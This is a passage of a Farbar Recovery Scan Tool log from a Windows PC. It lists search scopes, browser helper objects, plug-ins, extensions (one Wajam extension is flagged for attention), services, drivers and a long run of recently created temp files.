SearchScopes: HKLM-x32 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://www.ask.com/web?&o=101881&l=dis&q={SEARCHTERMS}
SearchScopes: HKLM-x32 -> {D943EABA-8E9F-40BE-861D-26636C0303F1} URL = hxxp://search.aol.com/aolcom/search?query={searchTerms}&invocationType=msie70a
SearchScopes: HKU\.DEFAULT -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://www.ask.com/web?&o=101881&l=dis&q={SEARCHTERMS}
SearchScopes: HKU\S-1-5-19 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://www.ask.com/web?&o=101881&l=dis&q={SEARCHTERMS}
SearchScopes: HKU\S-1-5-20 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://www.ask.com/web?&o=101881&l=dis&q={SEARCHTERMS}
SearchScopes: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000 -> {443789B7-F39C-4b5c-9287-DA72D38F4FE6} URL = hxxp://search.aol.com/aolcom/search?query={searchTerms}&invocationType=tb50TB50CLie7
SearchScopes: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
SearchScopes: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://www.ask.com/web?&o=101881&l=dis&q={SEARCHTERMS}
SearchScopes: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000 -> {D943EABA-8E9F-40BE-861D-26636C0303F1} URL = hxxp://search.aol.com/aolcom/search?query={searchTerms}&invocationType=msie70a
BHO: AOL Toolbar Loader -> {3ef64538-8b54-4573-b48f-4d34b0238ab2} -> C:\Program Files\AOL Toolbar\aoltb.dll [2015-02-19] (AOL Inc.)
BHO: Windows Live Family Safety Browser Helper Class -> {4f3ed5cd-0726-42a9-87f5-d13f3d2976ac} -> C:\Program Files\Windows Live\Family Safety\fssbho.dll [2010-04-28] (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> c:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO-x32: No Name -> {02478D38-C3F9-4efb-9B51-7695ECA05670} -> No File
BHO-x32: AOL Toolbar Loader -> {3ef64538-8b54-4573-b48f-4d34b0238ab2} -> C:\Program Files (x86)\AOL Toolbar\aoltb.dll [2015-02-19] (AOL Inc.)
BHO-x32: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} -> No File
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security Suite\Engine\22.7.1.32\coIEPlg.dll [2016-08-05] (Symantec Corporation)
BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton Security Suite\Engine\21.7.0.11\IPS\IPSBHO.DLL => No File
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\ssv.dll [2016-07-27] (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> c:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\jp2ssv.dll [2016-07-27] (Oracle Corporation)
Toolbar: HKLM - AOL Toolbar - {ba00b7b1-0351-477a-b948-23e3ee5a73d4} - C:\Program Files\AOL Toolbar\aoltb.dll [2015-02-19] (AOL Inc.)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security Suite\Engine\22.7.1.32\coIEPlg.dll [2016-08-05] (Symantec Corporation)
Toolbar: HKLM-x32 - AOL Toolbar - {ba00b7b1-0351-477a-b948-23e3ee5a73d4} - C:\Program Files (x86)\AOL Toolbar\aoltb.dll [2015-02-19] (AOL Inc.)
Toolbar: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No File
Toolbar: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000 -> &Links - {F2CF5485-4E02-4F68-819C-B92DE9277049} - C:\Windows\system32\ieframe.dll [2016-06-20] (Microsoft Corporation)
Toolbar: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000 -> No Name - {40D41A8B-D79B-43D7-99A7-9EE0F344C385} - No File
Toolbar: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000 -> No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - No File
DPF: HKLM-x32 {138E6DC9-722B-4F4B-B09D-95D191869696} hxxp://www.bebo.com/files/BeboUploader.5.8.05.cab
DPF: HKLM-x32 {166B1BCA-3F9C-11CF-8075-444553540000} hxxp://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
DPF: HKLM-x32 {4871A87A-BFDD-4106-8153-FFDE2BAC2967} hxxp://dlm.tools.akamai.com/dlmanager/versions/activex/dlm-activex-2.2.5.0.cab
DPF: HKLM-x32 {48DD0448-9209-4F81-9F6D-D83562940134} hxxp://lads.myspace.com/upload/MySpaceUploader1006.cab
DPF: HKLM-x32 {49312E18-AA92-4CC2-BB97-55DEA7BCADD6} hxxps://support.dell.com/systemprofiler/SysProExe.CAB
DPF: HKLM-x32 {615F158E-D5CA-422F-A8E7-F6A5EED7063B} hxxp://www.worldwinner.com/games/v51/bejeweled/bejeweled.cab
DPF: HKLM-x32 {639658F3-B141-4D6B-B936-226F75A5EAC3} hxxp://chill.comcast.net/GameShell/online/en/DinerDash2/DinerDash2.1.0.0.68.cab
DPF: HKLM-x32 {74E4A24D-5224-4F05-8A41-99445E0FC22B} hxxp://www.gamehouse.com/games/gamehouse/ghplayer.cab
DPF: HKLM-x32 {8A94C905-FF9D-43B6-8708-F0F22D22B1CB} hxxp://www.worldwinner.com/games/shared/wwlaunch.cab
DPF: HKLM-x32 {8F6E7FB2-E56B-4F66-A4E1-9765D2565280} hxxp://www.worldwinner.com/games/launcher/ie/v2.22.01.0/iewwload.cab
DPF: HKLM-x32 {8FA2192F-B95D-40E3-898F-8D7ABB8E00D0} hxxp://webgames.d.tmsrv.com/c=090ebd64320856d8effccd9c89a96f87/aff=t_05en_wg/p/release/playtime/wg_mahjongescapeancientchina/mahjongescapeancientchina/GameFiles/SpinTopGamesLauncher.cab
DPF: HKLM-x32 {99FE5072-78AA-4FEE-89BA-69A5FA55343F} hxxp://download.microsoft.com/download/B/3/A/B3A2EA73-793D-4ABE-992D-C81140384044/igdtoolx.cab
DPF: HKLM-x32 {9C23D886-43CB-43DE-B2DB-112A68D7E10A} hxxp://lads.myspace.com/upload/MySpaceUploader2.cab
DPF: HKLM-x32 {AC2881FD-5760-46DB-83AE-20A5C6432A7E} hxxp://www.worldwinner.com/games/v67/swapit/swapit.cab
DPF: HKLM-x32 {BA35B9B8-DE9E-47C9-AFA7-3C77E3DDFD39} hxxp://www.worldwinner.com/games/v46/monopoly/monopoly.cab
DPF: HKLM-x32 {BFF1950D-B1B4-4AE8-B842-B2CCF06D9A1B} hxxp://aolsvc.aol.com/onlinegames/free-trial-mahjong-fortuna-2-deluxe/zylomplayer.cab
DPF: HKLM-x32 {D0C0F75C-683A-4390-A791-1ACFD5599AB8} hxxp://chill.comcast.net/Gameshell/GameHost/1.0/OberonGameHost.cab
DPF: HKLM-x32 {DF780F87-FF2B-4DF8-92D0-73DB16A1543A} hxxp://aolsvc.aol.com/onlinegames/bejeweled2/popcaploader_v10.cab
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
DPF: HKLM-x32 {F46BD8B1-DE4C-4A4F-B6F6-8FB68D25342D} hxxp://webgames.d.tmsrv.com/c=090ebd64320856d8effccd9c89a96f87/aff=t_03cm_wg/p/release/playfirst/wg_mahjong_roadshow/mahjong_roadshow/MahjongRoadshowWeb.1.0.0.16.cab
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll [2010-04-16] (Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll [2010-04-16] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\JHS-JJS\AppData\Roaming\Mozilla\Firefox\Profiles\w9t2iu8p.default-1450825045209
FF DefaultSearchEngine.US: Google
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw.dll [2009-01-16] (Adobe Systems, Inc.)
FF Plugin-x32: @divx.com/DivX Browser Plugin,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX Web Player\npdivx32.dll [2008-11-06] (DivX,Inc.)
FF Plugin-x32: @divx.com/DivX Player Plugin,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX Player\npDivxPlayerPlugin.dll [2008-12-10] (DivX, Inc)
FF Plugin-x32: @garmin.com/GpsControl -> C:\Program Files (x86)\Garmin GPS Plugin\npGarmin.dll [2009-06-05] (GARMIN Corp.)
FF Plugin-x32: @java.com/DTPlugin,version=11.101.2 -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\dtplugin\npDeployJava1.dll [2016-07-27] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.101.2 -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\plugin2\npjp2.dll [2016-07-27] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50428.0\npctrl.dll [2016-04-27] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeLive,version=1.3 -> C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll [2008-11-13] (Microsoft Corp.)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8117.0416 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-04-16] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-30] (Microsoft Corporation)
FF Plugin-x32: @movenetworks.com/Quantum Media Player -> C:\Users\JHS-JJS\AppData\Roaming\Move Networks\plugins\npqmp071706000001.dll [2010-02-20] (Move Networks)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-28] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-28] (Google Inc.)
FF Plugin HKU\S-1-5-21-1231050607-2223395895-1768608861-1000: @movenetworks.com/Quantum Media Player -> C:\Users\JHS-JJS\AppData\Roaming\Move Networks\plugins\npqmp071706000001.dll [2010-02-20] (Move Networks)
FF Plugin HKU\S-1-5-21-1231050607-2223395895-1768608861-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\JHS-JJS\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2012-02-22] (Unity Technologies ApS)
FF SearchPlugin: C:\Users\JHS-JJS\AppData\Roaming\Mozilla\Firefox\Profiles\w9t2iu8p.default-1450825045209\searchplugins\norton-safe-search.xml [2016-08-12]
FF HKLM\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_22.5.2.15\coFFAddon
FF Extension: (Norton Identity Safe) - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_22.5.2.15\coFFAddon [2016-08-12]
FF HKLM-x32\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: (Microsoft .NET Framework Assistant) - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-09-01] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{7BA52691-1876-45ce-9EE6-54BCB3B04BBC}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\Norton\coFFPlgn => not found
FF HKLM-x32\...\Firefox\Extensions: [{3252b9ae-c69a-4eaf-9502-dc9c1f6c009e}] - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DMExtension
FF Extension: (Default Manager) - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DMExtension [2011-01-12] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_22.5.2.15\coFFAddon
FF HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\...\Firefox\Extensions: [[email protected]] - C:\Users\JHS-JJS\AppData\Roaming\Move Networks
FF Extension: (Move Media Player) - C:\Users\JHS-JJS\AppData\Roaming\Move Networks [2010-02-20] [not signed]

Chrome:
=======
CHR Profile: C:\Users\JHS-JJS\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Docs) - C:\Users\JHS-JJS\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-11-15]
CHR Extension: (Google Drive) - C:\Users\JHS-JJS\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-11-15]
CHR Extension: (YouTube) - C:\Users\JHS-JJS\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-11-15]
CHR Extension: (Google Search) - C:\Users\JHS-JJS\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-11-15]
CHR Extension: (Wajam) - C:\Users\JHS-JJS\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpmbfleldcgkldadpdinhjjopdfpjfjp [2013-11-15] [UpdateUrl: hxxp://www.wajam.com/update/Chrome/chrome_addon_updates.xml] <==== ATTENTION
CHR Extension: (Norton Identity Protection) - C:\Users\JHS-JJS\AppData\Local\Google\Chrome\User Data\Default\Extensions\mkfokfffehpeedafpekjeddnmnjhmcmk [2013-11-15]
CHR Extension: (Google Wallet) - C:\Users\JHS-JJS\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-11-15]
CHR Extension: (Gmail) - C:\Users\JHS-JJS\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-11-15]
CHR HKLM\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Security Suite\Engine\22.7.1.32\Exts\Chrome.crx [2016-08-27]
CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton Security Suite\Engine\21.7.0.11\Exts\Chrome.crx <not found>
CHR HKLM-x32\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Security Suite\Engine\22.7.1.32\Exts\Chrome.crx [2016-08-27]
CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [jpmbfleldcgkldadpdinhjjopdfpjfjp] - C:\Users\JHS-JJS\AppData\Local\Wajam\Chrome\wajam.crx [2012-10-05]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AERTFilters; C:\Windows\system32\AERTSr64.exe [86016 2008-07-18] (Andrea Electronics Corporation)
S3 IJPLMSVC; C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE [116104 2009-09-08] ()
R2 MSSQL$SQLEXPRESS; C:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe [29293408 2010-12-10] (Microsoft Corporation)
R2 N360; C:\Program Files (x86)\Norton Security Suite\Engine\22.7.1.32\N360.exe [289080 2016-08-16] (Symantec Corporation)
S3 Symantec RemoteAssist; C:\Program Files (x86)\Common Files\Symantec Shared\Support Controls\ssrc.exe [394704 2008-01-29] (Symantec, Inc.)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [383544 2008-01-20] (Microsoft Corporation)

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 BHDrvx64; C:\Program Files (x86)\Norton Security Suite\NortonData\22.5.2.15\Definitions\BASHDefs\20160826.008\BHDrvx64.sys [1854712 2016-08-18] (Symantec Corporation)
R1 ccSet_N360; C:\Windows\system32\drivers\N360x64\1607010.020\ccSetx64.sys [174328 2016-06-01] (Symantec Corporation)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [497392 2016-08-12] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [156912 2016-05-04] (Symantec Corporation)
R1 IDSVia64; C:\Program Files (x86)\Norton Security Suite\NortonData\22.5.2.15\Definitions\IPSDefs\20160829.001\IDSvia64.sys [876760 2016-07-08] (Symantec Corporation)
R2 RtNdPt60; C:\Windows\System32\DRIVERS\RtNdPt60.sys [26624 2008-07-21] (Windows ® Codename Longhorn DDK provider)
R1 SRTSP; C:\Windows\System32\Drivers\N360x64\1607010.020\SRTSP64.SYS [773360 2016-08-09] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\N360x64\1607010.020\SRTSPX64.SYS [48888 2016-06-01] (Symantec Corporation)
R0 SymEFASI; C:\Windows\System32\drivers\N360x64\1607010.020\SYMEFASI64.SYS [1627352 2016-06-01] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [101112 2016-07-03] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\N360x64\1607010.020\Ironx64.SYS [291056 2016-06-01] (Symantec Corporation)
R1 SYMTDIv; C:\Windows\System32\Drivers\N360x64\1607010.020\SYMTDIV.SYS [468152 2016-06-01] (Symantec Corporation)
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NAVENG; \??\C:\Program Files (x86)\Norton Security Suite\NortonData\22.5.2.15\Definitions\SDSDefs\20160703.001\ENG64.SYS [X]
S3 NAVEX15; \??\C:\Program Files (x86)\Norton Security Suite\NortonData\22.5.2.15\Definitions\SDSDefs\20160703.001\EX64.SYS [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-08-30 10:40 - 2016-08-30 10:41 - 00025346 _____ C:\Users\JHS-JJS\Desktop\FRST.txt
2016-08-30 10:40 - 2016-08-30 10:40 - 00000000 ____D C:\FRST
2016-08-30 10:38 - 2016-08-30 10:38 - 02397696 _____ (Farbar) C:\Users\JHS-JJS\Desktop\FRST64.exe
2016-08-30 10:21 - 2016-08-30 10:21 - 01315432 ____T C:\Windows\SysWOW64\00022813.tmp
2016-08-30 10:21 - 2016-08-30 10:21 - 01315432 ____T C:\Windows\SysWOW64\00020600.tmp
2016-08-30 10:21 - 2016-08-30 10:21 - 01315432 ____T C:\Windows\SysWOW64\00018935.tmp
2016-08-30 10:21 - 2016-08-30 10:21 - 01315432 ____T C:\Windows\SysWOW64\00017451.tmp
2016-08-30 10:21 - 2016-08-30 10:21 - 01315432 ____T C:\Windows\SysWOW64\00016519.tmp
2016-08-30 10:21 - 2016-08-30 10:21 - 01315432 ____T C:\Windows\SysWOW64\00014310.tmp
2016-08-30 10:21 - 2016-08-30 10:21 - 01315432 ____T C:\Windows\SysWOW64\00014309.tmp
2016-08-30 10:21 - 2016-08-30 10:21 - 01315432 ____T C:\Windows\SysWOW64\00009514.tmp
2016-08-30 10:21 - 2016-08-30 10:21 - 01315432 ____T C:\Windows\SysWOW64\00007616.tmp
2016-08-30 10:21 - 2016-08-30 10:21 - 01315432 ____T C:\Windows\SysWOW64\00006617.tmp
2016-08-30 10:21 - 2016-08-30 10:21 - 01315432 ____T C:\Windows\SysWOW64\00005249.tmp
2016-08-30 10:21 - 2016-08-30 10:21 - 01315432 ____T C:\Windows\SysWOW64\00002421.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00032591.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00032209.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00031107.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00030836.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00030191.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00029168.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00027938.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00027753.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00027624.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00027595.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00027506.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00027350.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00027348.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00026777.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00026418.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00024946.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00024767.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00024648.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00024484.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00024350.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00024221.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00024021.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00023986.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00023655.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00023199.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00022483.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00022355.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00021724.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00021548.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00020537.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00019668.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00018762.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00018636.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00018588.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00018127.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00018007.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00017807.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00017410.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00016941.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00016512.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00016413.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00015574.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00015573.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00015457.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00014945.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00014893.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00013966.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00013290.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00013030.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00012287.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00012052.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00011337.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00011020.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00010383.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00010291.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00009758.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00009374.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00009161.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00008909.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00008281.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00006900.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00006483.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00006422.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00006359.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00005097.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00004734.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00004596.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00004041.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00004031.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00003788.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00003728.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00003602.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00003430.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00001999.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00001655.tmp
